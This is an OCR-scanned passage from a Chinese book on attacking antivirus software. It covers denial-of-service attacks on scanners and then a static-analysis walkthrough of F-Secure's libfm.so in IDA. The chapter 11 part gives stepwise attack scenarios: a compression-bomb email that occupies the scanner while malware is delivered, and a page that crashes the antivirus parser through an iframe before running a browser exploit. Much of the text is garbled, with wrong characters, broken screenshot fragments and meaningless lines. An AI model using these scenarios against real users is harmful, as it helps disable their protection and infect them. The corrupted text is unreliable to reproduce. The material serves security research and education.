这 类 技巧 十 分 有 效 。 比 如 ,通过 一 些 操作 ,就 可 以 在 不 经 用 户 确认 或 不 请 求 提 权 的 情况 下 重 
启 机 恬 。 这 类 技巧 同样 也 可 以 用 在 多 阶段 的 漏洞 利用 攻击 中 。 一 个 十 分 有 可 能 成 功 的 假设 攻击 场 
景 如 下 。 

(1) 攻击 者 可 以 利用 以 下 漏洞 : 一 个 将 被 复制 到 用 户 开 始 目 录 中 的 文件 ， 一 个 允许 安装 任意 
驱动 的 bug， 或 是 一 个 允许 动态 链接 库 被 复制 到 一 个 目录 下 ， 并 在 重启 之 后 可 以 被 高 权限 的 进程 
调用 加 载 到 地 址 空间 中 的 bug。 

(2) 攻击 者 会 使 用 一 个 内 核 驱动 漏洞 来 使 机 器 强制 重启 ， 这 样 相 关 亚 意 操作 会 在 重启 之 后 
生效 。 

反 病 毒 软件 内 核 驱动 的 本 地 拒绝 服务 漏洞 的 数量 十 分 庞大 ; 每 年 都 会 出 现 一 些 影响 面 广泛 的 
本 地 拒绝 服务 漏洞 。 前 几 年 出 现 的 一 些 漏洞 PoC 可 以 通过 网 址 www.exploit-db.com 获 取 到 ， 如 图 
11-4 所 示 。 
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图 11-4 ”利用 反 病 毒 软件 缺陷 开展 的 DoS 攻 击 利用 程序 











11.2 ”远程 拒绝 服务 攻击 


和 其 他 所 有 暴露 了 远程 攻击 面 的 软件 一 样 , 反 病 毒 软件 也 会 存在 远程 拒绝 服务 漏洞 。 远程 拒 
绝 服务 攻击 是 针对 安装 了 某 些 反 病 毒 软件 的 用 户 计算 机 , 远程 发 起 拒绝 服务 攻击 。 远 程 拒绝 服务 
的 攻击 方式 有 很 多 ， 以 下 是 一 些 常 见 的 攻击 方式 : 
O 压缩 炸弹 ( 和 之 前 的 本 地 拒绝 服务 案例 类 似 ); 
a 文件 解析 器 漏洞 (和 之 前 的 本 地 拒绝 服务 案例 类 似 ); 
a 网 络 协议 解析 器 漏洞 ; 
口 针对 监听 网 络 流量 或 是 本 地 网 络 接口 (localhost、127.0.0.1 ) 的 反 病 毒 网 络 服务 的 拒绝 服 
务 攻击 。 
下 面 将 会 详细 介绍 上 述 几 个 攻击 方式 ， 并 将 阐释 如 何 利 用 它们 远程 实施 拒绝 服务 攻击 。 


11.2.1 压缩 炸弹 
与 本 地 拒绝 服务 一 样 , 我 们 可 以 使 用 压缩 炸弹 来 远程 临时 禁用 反 病 毒 软件 。 根 据 反 病毒 软件 
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和 邮件 客户 端的 不 同 ， 拒 绝 服 务 攻击 方式 如 下 : 

(1) 攻击 者 将 附 有 压缩 炸弹 的 邮件 发 送 给 目标 用 户 ; 

Q) 受害 者 收 到 邮件 后 ， 其 计算 机 上 的 反 病 毒 软件 会 立即 分 析 附 件 ; 

(3) 紧 接着 第 一 封 电子 邮件 ， 攻 击 者 会 再 次 发 送 恶意 软件 的 另 一 个 组 成 模块 ; 

(4) 反 病 毒 产 品 仍 然 在 分 析 第 一 个 压缩 炸弹 附件 ， 用 户 在 不 知情 的 情况 下 打开 第 二 封 邮件 中 
的 恶意 文件 ， 电 脑 就 会 被 感染 。 

当然 ,具体 的 攻击 场景 取决 于 不 同 的 反 病毒 产品 和 邮件 客户 端 。 一 些 反 病 毒 软件 会 阻止 用 户 
收 信 , 直到 每 一 封 邮件 都 已 扫描 完成 并 确认 是 安全 的 。 但 是 , 这 样 的 防护 会 让 用 户 觉得 收 信 缓 慢 ， 
所 以 很 多 反 病 毒 软件 都 不 会 这 么 操作 。 一 些 反 病 毒 软件 还 会 分 析 邮 件 附 件 的 安全 性 ( 在 扫描 压缩 
炸弹 的 过 程 中 ， 阻 断 邮 件 客户 端 收 信 )。 


11.2.2 ”文件 格式 解析 器 中 的 缺陷 


许多 反 病 毒 软件 会 使 用 启发 式 侦 测 漏洞 利用 程序 的 执行 。 这 类 技术 行为 各 异 , 但 是 防护 重点 
都 是 O 乌 ce 套 装 和 浏览 器 软件 。 可 以 借助 浏览 器 远程 利用 反 病 毒 软件 文件 格式 解析 过 程 中 的 缺陷 。 
下 面 介绍 一 个 典型 的 攻击 场景 ， 便 于 大 家 更 好 地 理解 。 

(1) 攻击 者 会 创建 一 个 可 以 识别 用 户 电脑 上 已 安装 反 病 毒 软件 的 页 面 。 当 然 ， 针 对 某 个 或 某 
些 特 定 的 反 病 毒 软件 ， 也 可 能 不 进行 反 病毒 软件 识别 。 

Q) 如 果 发 现 用 户 电脑 上 安装 了 存在 漏洞 的 反 病毒 软件 ， 会 将 用 户 浏 览 絮 导航 到 一 个 包含 
iframe 指 向 会 造成 反 病 毒 扫 描 咒 崩溃 的 文件 的 页 面 ， 这 样 反 病毒 软件 就 被 禁用 了 。 在 不 使 用 识 
别 技术 的 情况 下 ， 攻 击 者 也 可 以 逐个 地 让 反 病 毒 软件 扫描 器 处 理 可 能 会 造成 其 崩溃 的 畸形 页 面 ， 
直到 用 户 安装 的 反 病毒 软件 月 省。 

(3) 数秒 之 后 , 或 当 执行 了 某 些 事件 后 , 页 面 会 执行 利用 了 浏览 器 漏洞 的 JavaScript 攻 击 代码 。 

(4) 由 于 文件 格式 解析 过 程 中 的 漏洞 ， 反 病毒 软件 被 远程 拒绝 服务 攻击 禁用 ， 进 而 无 法 侦 测 
出 浏览 器 漏洞 的 利用 脚本 。 因 此 攻击 者 可 以 成 功 感染 用 户 的 计算 机 。 

上 述 攻 击 思路 和 真实 场景 基本 一 致 。 不 过 ,从 目前 的 公开 案例 来 看 , 还 没有 恶意 软件 使 用 类 
似 攻击 手段 。 










































































11.3 总结 


本 章 探 讨 了 多 种 拒绝 服务 漏洞 ,并 介绍 了 如 何 发 现 此 类 漏洞 ,并 利用 它们 来 攻击 反 病毒 软件 。 
针对 反 病 毒 软件 典型 的 本 地 拒绝 服务 攻击 是 , 通过 低 权限 运行 提升 权限 , 并 在 已 经 被 感染 的 计算 
机 上 或 在 感染 过 程 中 尝试 禁用 或 印 载 反 病 毒 软件 。 远程 拒绝 服务 攻击 的 目标 是 反 病毒 软件 中 可 以 
被 远程 接触 到 的 服务 模块 一 一 那些 不 需要 本 地 访问 ,可 以 在 外 部 接触 到 的 服务 模块 。 典 型 例子 是 ， 
攻击 者 通过 向 受害 者 发 送 恶 意 邮 件 或 使 用 社会 工程 学 方法 欺骗 用 户 点 击 恶 意 页 面 实施 攻击 。 

本 章 讨论 了 以 下 几 种 本 地 和 远程 攻击 方式 。 

口 压缩 炸弹 ”一 个 简易 的 “压缩 炸弹 "。 一 般 是 一 个 被 高 度 压 缩 、 在 解压 过 程 中 会 占用 几 百 
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MB 甚至 是 儿 GB 内 存 空 间 的 压缩 文件 。 这 样 一 来 ， 反 病毒 软件 会 陷入 忙碌 状态 ， 真 实 恶 
意 软件 可 以 趁 虚 而 人 ， 成 功 执行 。 压 缩 炸 弹 攻 击 可 以 影响 到 几乎 任何 一 款 反 病毒 软件 。 
O 文件 解析 器 的 漏洞 “这 类 漏洞 虽然 只 是 一 个 除 0 漏 洞 、 空 指针 引用 漏洞 ， 或 是 在 反 病 毒 软 
件 解析 过 程 中 造成 死 循 环 的 漏洞 ， 但 是 也 会 造成 反 病毒 服务 或 扫描 器 崩溃 ， 在 反 病 毒 软 

件 的 相关 监控 模块 重启 骨 省 的 服务 前 ， 给 攻击 者 提供 了 可 乘 之 机 。 
攻击 内 核 驱动 ”类似 文件 系统 过 滤器 驱动 、 网 络 过 滤器 驱动 或 反 病 毒 软件 的 其 他 内 核 驱 
动 ， 可 能 会 包含 可 以 用 来 攻击 用 户 的 逻辑 和 设计 缺陷 。 如 果 存 在 类 似 漏 洞 ， 攻 击 者 就 可 
以 借助 漏洞 以 最 高 权限 在 内 核 态 下 执行 任意 代码 。 
口 攻击 网 络 服务 ”以 上 三 种 攻击 方式 也 都 可 以 由 攻击 者 远程 发 起 。 如 果 存 在 文件 格式 解析 
漏洞 ， 类 似 反 病毒 软件 中 邮件 监控 这 样 的 网 络 服务 ， 就 可 以 被 攻击 者 用 来 攻击 用 户 。 同 
样 ， 带 有 压缩 炸弹 的 邮件 被 发 送 给 了 受害 者 ， 被 邮件 监控 模块 捕获 ， 触 发 拒绝 服务 漏洞 ， 
相关 服务 甚至 可 能 会 月 省 。 
下 一 章 将 会 探讨 如 何 有 条 理 地 进行 相关 研究 , 使 用 静态 分 析 技 术 查 找 反 病毒 软件 的 漏洞 、 薄 
弱 环 他、 设计 缺陷 并 收集 有 助 于 我 们 理解 反 病毒 软件 工作 原理 及 其 绕 过 方式 的 相关 信息 。 
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静态 分 析 























静态 分 析 是 一 种 不 依靠 真实 执行 程序 进行 软件 分 析 的 研究 手段 。 该 方法 使 用 静态 手段 提取 所 
有 分 析 所 需 的 相关 信息 〈 比如 发 现 漏洞 )。 

静态 代码 分 析 一 般 通 过 阅读 源 代 码 或 针对 闭 源 软件 进行 反 汇 编 来 实现 。 尽 管 使 用 这 种 技术 
分 析 软 件 十 分 耗 时 ， 但 结果 是 最 为 精准 的 ， 因 为 在 分 析 过 程 中 分 析 者 需要 从 底层 了 解 软件 的 工 
作 原 理 。 

本 章 将 探讨 如 何 使 用 静态 分 析 手 段 来 发 现 反 病毒 软件 中 的 漏洞 。 主 要 涉及 的 静态 分 析 工 具 是 
IDA。 

12.1 手动 二 进 制 审计 

手动 二 进 制 审计 是 一 个 手动 分 析 有 关 软 件 的 汇编 代码 并 从 中 提取 相关 信息 的 过 程 。 比 如 , 本 
章 将 会 向 你 介绍 如 何 手动 审计 F-Secure Anti-Virus Linux 版 的 旧版 本 ， 来 挖掘 出 一 些 可 以 远程 利用 
的 漏洞 ， 比 如 说 ， 文 件 格 式 解析 器 中 的 漏洞 。 对 我 们 来 说 幸运 的 是 ， 反 病毒 产品 自 带 调试 符号 ， 
这 让 我 们 的 静态 分 析 过 程 变 得 容易 了 许多 。 

如 果 Windows 应 用 有 程序 数据 库 (program database，PDB ) 文件 ， 或 者 相关 Unix 应 用 内 置 了 
DWARF 调 试 信息 ， 我 们 就 可 以 从 中 获取 调试 符号 信息 ， 有 了 这 些 信息 ， 就 不 需要 分 析 所 有 的 导 
出 因数 了 。 这 可 以 帮助 我 们 省 下 逆向 分 析 相 关 导 出 函数 名 的 宝贵 时 间 。 如 果 没 有 足够 的 调试 符号 
信息 , 尤其 是 在 缺失 标准 库 函 数 信息 [那些 在 Cruntime( CRT ) 库 或 LIBC 中 的 函数 , 比如 malloc、 
strlen、memcpy 等 ] 的 情况 下 ， 我 们 可 以 使 用 IDA 的 Fast Library Identification and Recognition 
Technology ( FLIRT ) 功能 来 找 出 相关 函数 名 。 退 一 万 步 讲 ， 即 便 在 没有 任何 调试 符号 的 帮助 下 ， 
我 们 仍然 可 以 通过 粗略 查看 相关 函数 的 大 概算 法 和 执行 目的 来 了 解 某 个 函数 的 功能 ,在 稍 后 会 提 
到 的 一 个 逆向 分 析 例 子 中 , 我 舍弃 了 一 些 函 数 的 相关 分 析 ,， 因 为 可 以 直接 判断 出 这 些 函 数 与 RSA 
算法 有 关 。 


12.1.1 文件 格式 解析 器 


本 章 将 会 使 用 F-Secure Anti-Virus Linux 版 进行 实验 和 演示 。 产 品 安装 完成 以 后 ，F-Secure 
Anti-Virus Linux 版 会 创建 一 个 /optf-secure 目 录 ， 下 面 还 有 一 些 子 目录 和 文件 。 
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$ 1s -1 /opt/f-secure/ 
total 12 


drwxrwxr-x 5 root root 4096 abr 19 2014 fsaua 
drwxr-xr-x 3 root root 4096 abr 19 2014 fsav 
drwxrwxr-x 10 root root 4096 abr 19 2014 fssp 








$ Is -1 /opt/f-secure/fsav/bin/ 
total 4 
lrwxrwxrwx 1 root root 48 abr 19 2014 clstate generator -> 
/opt/f-secure/fsav/../fssp/bin/clstate generator 

lrwxrwxrwx 1 root root 45 abr 19 2014 clstate update -> 
/opt/f-secure/fsav/../fssp/bin/clstate update 

lrwxrwxrwx 1 root root 49 abr 19 2014 clstate updated.rc -> 
/opt/f-secure/fsav/../fssp/bin/clstate updated.rc 





lrwxrwxrwx 1 root root 39 abr 19 2014 dbupdate -> 
/opt/f-secure/fsav/../fssp/bin/dbupdate 

lrwxrwxrwx 1 root root 44 abr 19 2014 dbupdate lite -> 
/opt/f-secure/fsav/../fssp/bin/dbupdate lite 

lrwxrwxrwx 1 root root 35 abr 19 2014 fsav -> 
/opt/f-secure/fsav/../fssp/bin/fsav 

lrwxrwxrwx 1 root root 37 abr 19 2014 fsavd -> 
/opt/f-secure/fsav/../fssp/sbin/fsavd 


lrwxrwxrwx 1 root root 37 abr 19 2014 fsdiag -» 
/opt/f-secure/fsav/../fssp/bin/fsdiag 
































lrwxrwxrwx 1 root root 42 abr 19 2014 licensetool -> 

/opt/f-secure/fsav/../fssp/bin/licensetool 

-rwxr--r-- 1 root root 291 abr 19 2014 uninstall-fsav 
链接 指 向 的 是 fsp 目 录 ， 因 此 这 里 值得 我 们 一 探究 竟 : 

$ ls -1 /opt/f-secure/fssp/ 

total 32 

drwxrwxr-x 2 root root 4096 abr 19 2014 bin 

drwxrwxr-x 2 root root 4096 ene 30 2014 databases 

drwxrwxr-x 2 root root 4096 abr 19 2014 etc 

drwxrwxr-x 3 root root 4096 abr 19 2014 lib 

drwxrwxr-x 2 root root 4096 abr 19 2014 libexec 

drwxrwxr-x 2 root root 4096 abr 19 2014 man 

drwxrwxr-x 2 root root 4096 abr 19 2014 modules 

drwxrwxr-x 2 root root 4096 abr 19 2014 sbin 














KRET! 上 述 目录 包含 数据 库 、 程 序 目 录 (bin 和 sbin )、 库 目录 (lib£flllibexec )、 


通过 观察 文件 列表 , 我们 大 概 可 以 推测 出 前 级 fs 代表 F-Secure 而 前 级 av 是 反 病 毒 的 意思 。 如 
果 进 入 第 二 个 目录 查看 ， 我 们 可 以 发 现 该 目录 几乎 包含 了 全 部 专门 的 符号 链接 。 





命令 与 函数 


帮助 文档 , 以 及 组 件 目 录 。 让 我 们 研究 一 下 lib 目 录 , 看 看 是 否 能 找到 一 个 或 多 个 带 有 代码 处 理 文 


件 格式 的 库 。 


$ ls -1 /opt/f-secure/fssp/lib 


total 3112 

-rw-r--r-- 1 root root 2475 nov 19 2013 fsavdsimple.pm 
-rwxr-xr-x 1 root root 252111 nov 19 2013 fsavdsimple.so 
-rw-r--r-- 1 root root 32494 ene 30 2014 fssp-common 
-rwxr-xr-x 1 root root 244324 ene 30 2014 libdaas2.so 
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-rwxr-xr-x 1 root root 123748 ene 30 2014 libdaas2tool.so 
-rwxr-xr-x 1 root root 1606472 ene 30 2014 libfm.so 
lrwxrwxrwx 1 root root 7 abr 19 2014 libfsavd.so -> 
libfsavd.so.7.0.0 
lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.4 -> 
libfsavd.so.4.0.0 
-rwxr-xr-x 1 root root 66680 ene 30 2014 libfsavd.so.4.0.0 
lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.5 -> 
libfsavd.so.5.0.0 
-rwxr-xr-x 1 root root 70744 ene 30 2014 libfsavd.so.5.0.0 
lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.6 -> 
libfsavd.so.6.0.0 
-rwxr-xr-x 1 root root 74872 ene 30 2014 libfsavd.so.6.0.0 
lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.7 -> 
libfsavd.so.7.0.0 
-rw-r--r-- 1 root root 79040 nov 19 2013 libfsavd.so.7.0.0 
lrwxrwxrwx 1 root root 13 abr 19 2014 libfsclm.so -> 
libfsclm.so.2 
lrwxrwxrwx 1 root root 8 abr 19 2014 libfsclm.so.2 -> 
libfsclm.so.2.2312 
-rwxr-xr-x 1 root root 309724 may 21 2013 libfsclm.so.2.2312 
lrwxrwxrwx 1 root root 20 abr 19 2014 libfsmgmt.2.so -> 
libmgmtfile.2.0.0.so 
lrwxrwxrwx 1 root root 17 abr 19 2014 libfssysutil.so -> 
libfssysutil.so.0 
-rwxr-xr-x 1 root root 27272 ene 30 2014 libfssysutil.so.0 
-rwxr-xr-x 1 root root 44532 ene 30 2014 libkeycheck.so 
-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfile.2.0.0.so 
lrwxrwxrwx 1 root root 20 abr 19 2014 libmgmtfile.2.so -> 
libmgmtfile.2.0.0.so 
-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfsma.2.0.0.so 
-rw-rw-r-- 1 root root 2386 ene 23 2014 libosid 
-rw-r--r-- 1 root root 96312 nov 26 2013 libsubstatus.1.1.0.so 
lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.1.so -> 
libsubstatus.1.1.0.so 
lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.so -> 
libsubstatus.1.1.0.so 
-Yw-rw-r-- 1 root root 2696 ene 23 2014 safe rm 
drwxrwxr-x 2 root root 4096 abr 19 2014 x86 64 


我 们 会 发 现 许 多 库 文件 , 但 是 其 中 有 一 个 特别 引 人 注 意 ， 
libfm.so。 使 用 指令 nm -B 查 看 是 否 有 调试 符号 : 


$ LANG=C nm -B /opt/f-secure/fssp/lib/libfm.so 
nm: /opt/f-secure/fssp/lib/libfm.so: no symbols 


结果 显示 似乎 没有 调试 符号 。 但 是 ,我们 得 到 了 另外 一 个 符号 信息 来 源 : 已 导出 的 调试 符号 
列表 。 这 一 次 我 们 使 用 指令 readelf -Ws: 


$ LANG-C readelf -Ws libfm.so | 


因为 相 比 其 他 库 文 件 来 说 它 要 大 得 








more 


Symbol table '.dynsym' contains 3820 entries: 
Num: Value Size Type Bind Vis Ndx Name 
0: 00000000 0 NOTYPE LOCAL DEFAULT UND 
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1: 00042354 0 SECTION LOCAL DEFAULT 8 
2: 0004a0ac 0 SECTION LOCAL DEFAULT 10 
3$.001331f0 0 SECTION LOCAL DEFAULT 11. 
4: 00133220 0 SECTION LOCAL DEFAULT 12 
5: 00139820 0 SECTION LOCAL DEFAULT 13 
6: 00139828 0 SECTION LOCAL DEFAULT 14 
7: 00161aa4 0 SECTION LOCAL DEFAULT 15 
8: 00169098 0 SECTION LOCAL DEFAULT 16 
9: 001690a0 0 SECTION LOCAL DEFAULT 17 
10: 001690a8 0 SECTION LOCAL DEFAULT 18 
11: 001690c0 0 SECTION LOCAL DEFAULT 19 
12: 0016c280 0 SECTION LOCAL DEFAULT 23 
13: 00187120 0 SECTION LOCAL DEFAULT 24 
14: 000d29gdc 364 FUNC GLOBAL DEFAULT 10 
.ZN21CMfcMultipartBodyPartD2Ev 
15: 00066034 415 FUNC GLOBAL DEFAULT 10 
 Z20LZ CloseArchivedFileP11LZFileDataIP14LZArchiveEntry 
16: 000bd850 92 FUNC GLOBAL DEFAULT 10 
 ZNK16CMfcBasicMessage7SubtypeEv 
17: 00000000 130 FUNC GLOBAL DEFAULT UND 
. cxa guard acquireQCXXABI 1.3 (2) 
18: 00000000 136 FUNC GLOBAL DEFAULT UND 
. Cxa end catchGCXXABI 1.3 (2) 
19: 0006f21c 647 FUNC GLOBAL DEFAULT 10 
 Z13GZIPListFilesP11LZFileDataIP7GZ DATA 
20: 000e42c6 399 FUNC GLOBAL DEFAULT 10 
 ZNK12CMfcDateTime6 ParseEb 
21: 000e0ce8 80 FUNC GLOBAL DEFAULT 10 ZN10FMapiTableD2Ev 
22: 000a8a6c 163 FUNC GLOBAL DEFAULT 10 














.ZN13SISUnArchiverl2uninitializeEv 
bend 


HEY 我 们 得 到 了 许多 调试 符号 ( reade1f 显 示 有 3820 个 )。 虽然 在 命令 行 界面 里 调试 符号 名 
称 有 些 混乱 , 但 在 IDA 中 显示 就 不 会 混乱 了 。 有 了 这 么 多 调试 符号 ， 在 逆向 分 析 库 的 时 候 就 会 容 
易 许多 。 首 先 , 让 我 们 筛选 一 下 结果 , 确认 该 库 是 否 就 是 用 于 解析 文件 格式 、 解 包 压 缩 文 件 或 用 


于 进行 相关 任务 的 那个 ; EMI 


$ LANG-C readelf -Ws libfm.so | egrep -i "(packer|compress|gzip|bz2)" 
| more 




















19: 0006f21c 647 FUNC GLOBAL DEFAULT 10 
 Z13GZIPListFilesP11LZFileDataIP7GZ DATA 

41: 000af770 47 FUNC GLOBAL DEFAULT 10 
—ZN17LzmaPackerDecoderD1Ev 

47: 000ae0c8 7 FUNC WEAK DEFAULT 10 
 ZN20HydraUnpackerContexti13confirmActionEjPc 

55: 000a2ae8 169 FUNC GLOBAL DEFAULT 10 


 ZN29FmPackerManagerImplementationl18packerFindNextFileEiP17FMF 
INDDATA struct 

59: 000D1b04 7 FUNC WEAK DEFAULT 10 
 ZN19FmUnpackerInstaller28packerQueryArchiveMagicBytesERSt6vectorIl 
13ArchMagicByteSaIlS1 EEm 

75: O000adff4 11 FUNC WEAK DEFAULT 10 
.ZNK20HydraUnpackerContexti12FmFileReader13getFileStatusEv 





78: 000a5724 54 FUNC GLOBAL DEFAULT 10  |ZN14FmUnpackerCPIODOEv 

83: 00134878 15 OBJECT WEAK DEFAULT 12  ZTS12FmUnpacker7z 

84: 000a15d8 54 FUNC GLOBAL DEFAULT 10 packerGetFileStat 

94: 000adba4 7 FUNC GLOBAL DEFAULT 10 
.ZN14FmUnpackerSisX15packerWriteFileEPvS0 l1PKvmPm 

122: 000a1948 7 FUNC GLOBAL DEFAULT 10 


es) 
没 错 ! 筛选 结果 显示 该 库 中 包含 进行 对 压缩 文件 格式 以 及 加 壳 文 件 处 理 的 代码 。 在 IDA 中 打 
开 该 库 。 初 始 化 自动 分 析 以 后 ， 如 图 12-1 所 示 的 Functions 窗 口中 清楚 地 罗列 了 函数 名 称 。 
ET CE CC TEI EF TR ET 
| mmm" UN | 


f] Functions window Dex IDA View-A 日 | È Loaded ype 
Function name 到 -text:0004A0AC 












































.text:0004A0AC ; ----- 
-text:0004A0AC 
-text:0004A0AC ; Attri] 
-text:0004A0AC 


LZ CloseArchivedFile(LZFileDatal *,LZArchiveEr 
. .cxa guard acquire 


—cxa end catch .text:0004A0AC 
GZIPListFiles(LZFileDatal *,GZ DATA *) .text:0004A0AC start 
CMfcDateTime:: Parse(bool) .text:0004A0AC 
SISUnArchiver::uninitialize(void) „text :0004A0AD 
StopMemoryTracer(void) .text:0004A0AF 
std:vector«FProperty,std::allocator«FPropert -text :0004A0B0 


-text:0004A0B5 
-text:0004A0B6 
-text:0004A0BC 
-text:0004A0BD 


ModelPPM::Destroy(void) 
TarReadArchiveditem(TAR FILE DATA *,TAR ITE! 
CFspeFileReader::CFspeFileReader(int) 


EIEIEIEIEI SIEHE EIEIEIEIEI EIETSIEIEI SITE EIE EIEITEIE 

















PSTGetFileSize(tagPST COMPONENT HANDLE * text :0004A0C3 
CMfcString::size(void) .text:0004A0C5 
FProperty:FProperty(FProperty const&) .text:0004A0C7 
CMfcMultipartBodyPart::SetContentld(CMfcStrir -text:0004A0C9 
. gnu ow: normal iterator«FTnefAttribute * .text:0004A0C9 loc 4A0 
. Cxa rethrow -text:0004A0C9 
logf -text:0004A0CA 
E -text:0004A0CB 
std::vector«FProperty,std::allocator«FPropert "text:0004A0CC 
CMfcGroup::CMfcGroup(CMfcGroup const&) .text:0004A0CC start 
CMfcString::c str(void) .text:0004A0CC 
CMfcBodyParser::Epilogue(void) .text:0004A0CC ; ----- 
std:: Rb tree«long.std::pair«long const,long: .text:0004A0CD 
CMfcDateTime:: FromUnixTime(uint) .text:0004A0D0 
CMfcUUBodyParser::- CMfcUUBodyParser() . kpek : QD A DO p assas 
std::_miter_base<FPropertyValue *,false>:: T N 
FMIO Close(int int) pere 71 -text:0004A0DO0 ; Attrij 
- 三 -text:0004A0D0 
[7] wpeEnumTostrtint,cMfcstring &) text:0004A0D0 sub 4A0 
T Sagfatrabue-FTettstrburntTrettrtrbnt e QI .text:0004A0D0 
Line 1 of 5834 Jooo4aocc [ooo4aocc: start*20 |(syn| 





12-1 在 IDA Pro 中 打开 库 文件 libfm.so 的 效果 


正如 我 们 看 到 的 那样 ，IDA 和 窗口 左 侧 罗 列 了 许多 有 用 的 函数 名 称 ， 但 是 下 一 步 应 该 怎么 做 
ME? 一 般 来 说 ， 我 在 查找 漏洞 的 时 候 会 首先 查找 应 用 的 内 存 管理 函数 ( malloc、free 等 函数 )， 
然后 从 这 些 函 数 入 口 开始 挖掘 漏洞 。 此 外 还 可 以 在 Functions 窗 口中 点 击 Function Name 按 钮 , f% PK 
数 名 进行 排序 ， 然 后 搜索 包含 malloc 关 键 词 的 函数 名 。 本 例 中 ， 有 两 个 带 有 FMAlloc (uint) 名 
称 的 列表 。 一 个 是 thunk 孙 数 ， 男 一 个 是 实际 执行 的 函数 。 实 际 执行 的 函数 被 Lhunk 消 数 和 全 局 
对 象 表 (global object table, GOT ) 调用 ， 而 thunk 函 数 会 被 程序 剩余 部 分 调用 。 点 击 thunk 函 数 
上 的 X 键 ，IDA 会 显示 其 交叉 调用 ,结果 如 图 12-2 所 示 。 
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[uz] xrefs to FMAlloc(uint) 


Directio rT 
EU 


ZEN Z7FMAllocj ; FMAlloc(uint) 










S i exeOpenFile(int *,int,ta... Z7FMAlocj ; FMAlloc(uint) 
D... exeOpenFile(int *,int.ta... Z7FMaAllocj ;FMalloc(uint) 
D. exeFindNextFile(int,FMF. Z7FMAllocj ; FMaAlloc(uint) 
D. exeFindFirstFile(int *,int... Z7FMAllocj ; FMalloc(uint) 
D. Filelo Query Datablock... Z7FMAllocj ;FMalloc(uint) 
D. fmGetFullFileName- 70 Z7FMaAllocj : FMaAlloc(uint) 


ReadBzipFile(BZIP ARCH... call 
InitBzipStructure(int,BZ... call 
InitBzipStructure(int,BZ... call 


Z7FMallocj ;FMalloc(uint) 
Z7FMallocj ;FMalloc(uint) 
Z7FMallocj ;FMalloc(uint) 


sub 54F30«18 call — Z7FMAllocj ; FMlloc(uint) 
BZ2 bzReadOpen«5B call Z7FMallocj ;FMalloc(uint) 
IsBzipFile(int)4-31 call — Z7FMAllocj ; FMAlloc(uint) 


OpenCabFile(CAB FILE *... call 
OpenCabFile(CAB FILE *... call 
OpenCabFile(CAB FILE *... call 
OpenCabFile(CAB FILE *... call 
OpenCabFile(CAB FILE *... call 
InitcabStructure(int,CA... call 
InitCabStructure(int,CA... call 
InitCabStructure(int,CA... call 
InitcabStructure(int,CA... call 
InitcabStructure(int,CA... call 
InitCabStructure(int,CA... call 
InitCabStructure(int,CA... call 
InitCabStructure(int,CA... call 
InitCabStructure(int,CA... call 


Cancel | search Help 


Z7FMallocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMallocj ; FMalloctuint) 
Z7FMallocj ; FMalloc(uint) 
Z7FMAllocj ; FMAlloc(uint) 
Z7FMaAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMalloc(uint) 
Z7FMAllocj ; FMAlloc(uint) 
Z7FMAllocj ; FMAlloc(uint) 








pop 
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5 
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图 12-2 ÆRS5IHTFMAlloc (unit) 的 位 置 


我 们 可 以 看 到 该 函数 有 248 次 代码 调用 ,这 实际 上 是 一 个 malloc 封 装 函 数 。 现 在 让 我 们 分 析 
函数 FMAl1l1oc， 以 便 了 解 其 工作 原理 。 
通过 观察 FMAlloc 的 反 汇 编 结 果 ， 我 们 发 现 函 数 会 首先 检查 某 些 全 局 指针 是 否 不 为 NULL。 
函数 用 于 获取 一 指向 LIBC 的 函数 malloc 的 指针 : 


.text:0004D76C ; | DWORD _ cdecl FMAlloc(size t n) 














.text:0004D76C public . Z7FMA110cj 
.text:0004D76C  Z7FMAllocjproc near ; CODE XREF: FMAlloc(uint);j 
.text:0004D76C n = dword ptr 8 


.text:0004D76C 

.text:0004D76C push ebp 
.text:0004D76D mov ebp, esp 
.text:0004D76F push edi 
.text:0004D770 push esi 
.text:0004D771 push ebx 
.text:0004D772 sub esp, OCh 
.text:0004D775 call $5 
.text:0004D77A pop ebx 
.text:0004D77B add ebx, 11CBAEh 
.text:0004D781 mov eax, ds:(g fileio ptr - 16A328h) [ebx] 











; My guess is that it's returning a pointer to "malloc". 
.text:0004D787 mov eax, [eax+24h] 


; Is the pointer to malloc NULL? 
.text:0004D78A test eax, eax 


.text:0004D78C mov edi, [ebp+n] 
.text:0004D78F jz short loc 4D7BO 


sed n M cm uer 将 会 继续 执行 下 一 个 指令 ; 否则 会 进入 分 支 
0x4D7B0。 如 果 我 们 跟 进 这 一 处 跳 转 ， 会 发 现下 列 代码 : 
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.text:0004D7B0 loc 4D7B0: ; CODE XREF: FMAlloc (uint)+23]j 
.text:0004D7B0 sub esp, OCh 
.text:0004D7B3 push edi ; Size 
.text:0004D7B4 call  malloc 

.text:0004D7B9 add esp, OCh 
.text:0004D7BC push edi ; n 
.text:0004D7BD push 0 AE 
.text:0004D7BF push eax ZS 
.text:0004D7C0 mov esi, eax 
.text:0004D7C2 call  memset 

.text:0004D7C7 lea esp, [ebp-0Ch] 
.text:0004D7CA pop ebx 

.text:0004D7CB mov eax, esi 
.text:0004D7CD pop esi 

.text:0004D7CE pop edi 

.text:0004D7CF leave 

.text:0004D7D0 retn 

.text:0004D7D0 | Z7FMAllocj endp 











在 0x4D7B3 处 ， 这 部 分 代码 会 按照 函数 接受 的 参数 大 小 分 配 内 存 (具体 大 小 存储 在 EDI 注 册 
器 中 )。 接 着 代码 会 调用 memset 结 合 malloc 返 回 的 函数 指针 初始 化 缓冲 区 至 0x00s。 这 里 最 起 码 
有 两 个 缺陷 。 第 一 个 缺陷 是 ， 传 递 给 malloc 函 数 的 内 存 分 配 大 小 值 没 有 做 合法 性 校 验 。 我 们 可 
